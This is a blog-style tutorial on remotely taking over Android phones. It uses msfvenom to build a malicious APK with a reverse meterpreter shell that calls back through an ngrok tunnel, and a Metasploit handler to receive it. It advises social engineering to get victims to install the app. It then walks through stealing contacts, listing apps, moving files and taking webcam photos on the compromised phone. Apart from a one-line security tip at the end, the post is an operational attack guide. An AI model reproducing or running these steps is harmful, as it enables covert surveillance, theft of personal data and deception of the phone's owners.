Hacking Android Remotely (WAN) using Kali Linux | Android Hacking using Metasploit-Framework

Aditya Chauhan
4 min readOct 27, 2021

we use msfvenom to create the payload and save it as an .apk file. After creating the payload, we need to configure a monitor for the metasploit framework. After the target downloads and installs the malicious apk, an attacker can easily get back a meterpreter session on the Metasploit system. The attacker must perform some social manipulation to install the apk on the victim’s mobile device.

Tool’s required

1. Ngrok
2. Metasploit Framework

At first, download ngrok then setup ngrok in Kali machine .

After setup ngrok fire commead on terminal ./ngrok tcp <port>

we hack an Android device through Internet by using this method.

After run this command this type of screen display . Copy Forwarding highlight section .

After getting ngrok tcp ip use msfvenom tool that will generate a payload to penetrate Android device.

Type command :
# msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=19173 R>android.apk


-p indicates a payload type
android/metepreter/reverse_tcp specifies a reverse meterpreter shell would come in from a target Android device
LHOST is your port forwarding IP
LPORT is set to be as a listening port
R> android.apk is the final name of the final output

This would take some time to generate an apk file of almost ten thousand bytes.

Start Attacking

All seems to be set up, now run msfconsole. Use a multi/handler exploit, set the payload the same as previously generated, set the same LHOST and LPORT values ​​as used in the payload and finally type the exploit to launch the attack.

In this scenarios we are trying to hack android phone in internet, so we give lhost listing address and lport is given port in ngrok server.

In real life scenarios, some social engineering techniques can be used to let the target download the malicious apk file. For demonstration we are using wetransfer to send file link to the attacker machine to download the file in the Android device.

file send through wetransfer

After downloading it successfully, select the app to install.

So far, this option has been seen frequently when we try to install some third-party apps and normally users wont hesitate to allow the installation from unknown sources.

Enable the settings to install applications from the third-party sources. And finally hit the install option at the bottom.

Once the user installs the application and runs it, the meterepreter session would be opened immediately at the attacking side.

After entering the session, type “help” to list down all the commands we can put forward in this session.

You can see some file system commands that are helpful when you’re trying to go after some sensitive information or data. By using these, You can easily download or upload any file or information.

Type “app_list” and it will show you all the installed apps on the device

Now let extract some contacts from the target device by typing “dump” and double tab

find webcam

select webcam and click photos on hacked phone .

There are lots of more commands available in meterpreter. Further try to explore and learn what we can perform with an Android device. This concludes that we have successfully penetrated the Android device using Kali Linux and Metasploit-Framework.

A healthy tip to secure your Android device is to not install any apps from unknown sources, even if you really want to install them, try to read and check the source code to find out if this file is malicious or not.



Aditya Chauhan

ISO 27001 LA | VAPT | Synack Red Teamer | HTB Dante | HTB RASTA | HTB Cybernetics | HTB Offshore | HTB APTLabs | Cyber Security Analyst | Security Researcher